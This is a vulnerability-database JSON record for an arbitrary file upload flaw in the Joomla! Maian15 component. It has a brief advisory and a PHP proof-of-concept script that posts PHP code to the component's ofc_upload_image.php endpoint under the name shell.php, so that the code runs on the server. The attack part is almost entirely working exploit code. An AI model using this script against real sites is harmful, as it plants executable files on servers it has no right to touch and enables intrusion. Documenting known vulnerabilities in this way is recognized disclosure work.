{"lastseen": "2020-04-01T19:04:23", "references": [], "description": "\nJoomla! Component Maian15 - name Arbitrary File Upload", "edition": 1, "reporter": "SultanHaikal", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2013-10-20T00:00:00", "title": "Joomla! Component Maian15 - name Arbitrary File Upload", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:23", "rev": 2}, "score": {"value": 0.2, "vector": "NONE", "modified": "2020-04-01T19:04:23", "rev": 2}, "vulnersScore": 0.2}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2013-10-20T00:00:00", "id": "EXPLOITPACK:5867FA855F1FE0672B02B31ACD7F6666", "href": "", "viewCount": 2, "sourceData": "source: https://www.securityfocus.com/bid/63287/info\n\nThe Maian15 component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.\n\nAn attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. \n\n<?php\n$headers = array(\"Content-Type: application/octet-stream\");\n$uploadfile=\"<?php phpinfo(); ?>\";\n$ch =\ncurl_init(\"http://www.example.com/path/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=shell.php\");\ncurl_setopt($ch, CURLOPT_POST, true);\ncurl_setopt($ch, CURLOPT_POSTFIELDS, @$uploadfile);\ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\ncurl_setopt($ch, CURLOPT_HTTPHEADER, $headers);\n$postResult = curl_exec($ch);\ncurl_close($ch);\nprint \"$postResult\";\n?>", "cvss": {"score": 0.0, "vector": "NONE"}}

{}